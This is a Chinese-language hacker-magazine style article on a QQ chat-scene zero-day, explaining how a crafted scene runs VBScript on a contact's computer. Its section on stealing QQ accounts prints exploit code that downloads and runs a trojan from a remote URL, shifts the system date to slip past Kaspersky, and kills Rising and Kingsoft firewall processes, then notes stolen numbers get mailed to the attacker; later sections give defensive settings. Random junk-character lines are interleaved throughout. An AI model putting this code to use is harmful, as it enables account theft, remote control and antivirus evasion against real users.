惊!QQ新漏洞 腾讯3亿用户遭受威胁

天云上人

根据易观国际发布《2007年第2季度中国即时通讯市场季度监测》报告显示，中国活跃的IM软件账号已经达到了3.76亿个，其中拥有2.9亿活跃用户账号的腾讯QQ是当之无愧的IM王者。可是你知道吗，你的QQ现在很危险了!

　　不需要什么高超的技巧，黑客就可以轻松地盗取你的QQ。想知道他们是怎么做的以及该如何避免自己的QQ被盗吗?快随小编一起看看QQ场景漏洞的破解之法(属于0DAY漏洞)。
4 ]6 y9 Z9 }' {7 Y% t
" i$ D% E3 y) m　　月黑风高夜，黑客挖出了一个宝箱，里面盛放着光彩夺目的“QQ场景漏洞”。他们惊奇的发现，不需要有什么高超的技巧，只要懂一点基本的脚本代码编写，就可以轻松地盗取别人的QQ、秘密安装监控软件或破坏系统等。于是，地狱之门就被打开了，所有的QQ用户都被恐惧笼罩着。
5 ^* w. r( R* ], w& M! P8 Y3 f
0 n6 [1 |9 M' D7 j' ]8 R　　一、QQ场景漏洞的利用原理解析
/ Z1 N# N" x) N& u* p. w- F; z1 Y
　　聊天场景是QQ软件中的一项基本功能，可以让聊天的双方使用同样的场景，从而拉近聊天用户之间的距离。不过最新的QQ场景漏洞，可能会让大家的QQ有被盗的风险。
+ X6 F2 ~( f! c4 N
　　该漏洞的利用原理很简单，攻击者向其QQ列表内的用户发送一个恶意构造的场景，场景里面包括图片文件、VBScript.qqs文件和Config.qqs文件，其中VBScript.qqs文件就是编写恶意代码的地方，然后在远程系统中执行即可。
- M# v2 }! z) Q& U& N- P+ U5 v
# z% y7 T  E% p/ e　　二、QQ场景漏洞的危害有多大

6 D  s6 D! |7 X9 I- Y  [" ]　　QQ场景漏洞的危害到底多大?重则可能系统崩溃，资料消失;轻则可能QQ被盗，这些后果都是很严重的。更可怕的是，漏洞的利用方法特别简单，不需要什么操作即可实现，会成为大量手痒的菜鸟黑客们的最爱。

, @) P7 q3 ]' o. O4 h% I　　添加的脚本代码的作用不同，造成的危害性也会不同。比如，如果是一段文件下载脚本代码的话，那么代码就会自动下载设置的文件并默默地运行。如果下载的是木马后门程序的话，黑客就可以通过木马进行远程控制。如果是一段格式化代码的话，那么磁盘中的文件就会瞬间被清除掉。

　　小提示：QQ场景漏洞的危害程度判断是参考了标准的次高危害漏洞(百度搜霸远程执行漏洞)和标准的中等危害漏洞(WMP AU文件除零漏洞)。

3 _& |9 M+ U: T, q0 H    三、试用QQ场景漏洞

3 H: F4 g8 R0 n" \* j' t　　首先，将QQ场景漏洞所需的场景文件下载到本地系统，解压后复制到系统中QQ的安装目录X:\Program Files\Tencent\QQ下面，这样在Scene文件夹中就多了一个场景目录。现在我们就可以进行测试操作，不过为了弹出窗口更加有个性化，我们要对场景目录真的脚本文件进行修改。
1 C$ ]" L+ T& e% ?+ N
7 E( E& _6 L# w+ j: \　　接着，用文本编辑器打开其中的VBScript.qqs文件，在文件代码中找到MsgBox这个消息函数，该函数后面跟着的就是该场景在执行后弹出的信息内容，这里我们可以将它设置为自己需要弹出的内容信息，比如设置为“电脑报，我的最爱!”。如果你熟悉VBS脚本，可以设置更有个性的语句。
% f) c, N4 m, Z. j0 }$ o9 ?
, E" d( G% F. |/ e2 g% L　　然后，随便在QQ联系人列表中找一个人，无论对方使用的是QQ还是TM都可以，双击打开其聊天窗口。然后点击工具栏中的“选择音乐场景”按钮，在弹出的窗口中选择打开“我的场景”标签，并且找到一个和场景目录名称相同的场景。这样这个带有VBS脚本的场景，就会自动的下载到远程好友的QQ 中并运行。

　　四、如何利用QQ场景漏洞盗QQ

　　漏洞用熟后，就可以开始盗QQ了。首选下载该漏洞的利用代码，然后进行简单的修改即可。下面就对代码的关键部分进行讲解。

　　iLocal = LCase("c:\mm.exe"):iRemote = LCase("http://www.****.com/mygim.exe")

　　代码作用是将文件下载到磁盘中指定的位置，我们只需要把其中的http://www.****.com/mygim.exe改为自己的木马地址即可。
2 }$ x8 j) t& w* m4 o4 n
　　Set ws = CreateObject（"Wscript.Shell"）

9 E+ x* b7 \* V1 R0 d4 Y$ U5 K9 [: A! L　　ws.run "cmd /c set date=%date% &&date 1988-1-1 &&ping -n 30 127.0.0.1&&date %date%",vbhide
) c& A$ e9 J+ B* D1 J3 w
  N) G% [+ D5 v. K5 G' G　　for each ps in getobject（"winmgmts:\\.\root\cimv2:win32_proCESs"）.instances_
# _& E1 D7 Y) v
+ w/ U, w* N% Q  m8 H6 P& }/ a* U　　if ps.Name="rfwsrv.exe" then
$ D$ q! g  s/ \+ I9 r4 T; r* `
, \& U3 [: Z; F% Z# J. d　　ws.run "ntsd -c q -p ps.handle",0

" T. F8 U  H' E! z) A% p- o. O　　这段代码主要有两个作用，首先是通过修改系统的时间，从而让下载的木马程序躲过卡巴斯基的主动防御功能。接着用于检测系统中是否存在瑞星防火墙，如果存在的话就结束该防火墙的进程。
9 @) l) J6 C8 F8 `
" b2 Q7 J! n( _% q/ S. E7 M% A　　当然我们可以依葫芦画瓢来添加结束其他进程的代码，比如要结束金山网镖的进程，只需要将代码if ps.Name="rfwsrv.exe" Then中的rfwsrv.exe，替换为金山网镖的进程名称KPFW32.exe即可。经过这一系列的处理以后，盗号木马就能成功的获取远程用户的QQ号码，并且最终发送到我们指定的信箱里面呢。

    五、QQ场景漏洞的防范措施

% ~, W0 e- T2 v8 z　　由于QQ场景漏洞是一个全新的0DAY漏洞，因此现在还没有现成的安全补丁可以使用，所以只能临时用其他的方法来进行相关的防范。有的人说TM没有聊天场景，因此可以利用TM来代替QQ，但是经过我们的测试发现TM依然受到该漏洞的影响。

　　同样在联系人列表中任意的选择一位，接着点击工具栏中的“选择音乐场景”按钮，然后在“我的场景”标签中点击“在我的场景设置”按钮。现在只需要在弹出的窗口里面把“接受场景邀请”前面的勾去掉就可以啦。除此以外，还可以选择Scene目录的属性选项，将它的属性设置为只读即可。

　　如果用户已经不信“中标”的话，那么现在还有两种方法可以解决。第一在“我的场景”标签里，选择“不使用场景”选项就可以。另外可以直接到QQ目录中的Scene文件夹，将它中的所有内容彻底删除，就可以完全避免以前的漏洞场景被重新激活。
* u. B* E% C& p  x* @
) `$ p) ?& _5 P! j: W　　六、QQ场景漏洞的预防方案
* y, k1 M+ C9 r% v
　　由于QQ场景漏洞是通过恶意脚本来进行操作的，因此要预防漏洞的方法就是防止非法的聊天场景写入系统磁盘。
, y8 z. Q  c1 b9 }
　　我们可以通过一款名为《系统安全盾》的安全软件进行防范，该程序不但可以对设置的文件夹进行有效的监控，还可以对非法运行的程序进行有效的拦截操作，这样就从多个方面对系统安全进行保护，并且该程序的自身保护能力也非常的强，只有在正确的输入了确认码后才会弹出，有效的防止程序进程被恶意代码非法结束。
, u* |1 @' E" ?( R; Y  @8 i& w
　　《系统安全盾》运行后，点击程序主界面中“监控设置”菜单中的“监控设置调整”命令。程序在默认的情况下，是无法将文件添加到系统目录的。为了更好的监控下载的聊天场景，我们点击鼠标右键来新增项目，双击新增的项目来设置新的监控路径，然后将项目内容都选择√选项。
8 s8 H- V: a# R: }/ _3 r3 I2 l
2 n+ t& F& ^+ |+ P9 k6 @+ z　　接着再在“文件黑名单”选项里面，将聊天场景中主要的VBScript.qqs文件添加到黑名单，更改配置后一定要点击“应用设置”按钮进行保存。这样当程序检测到这些可疑文件后，就会立即的进行拦截操作并提示用户。

* `7 m8 E1 f4 o1 z% f: x% m　　注：此文只用与交流,如利用本文的内容造成的后果请自行负责。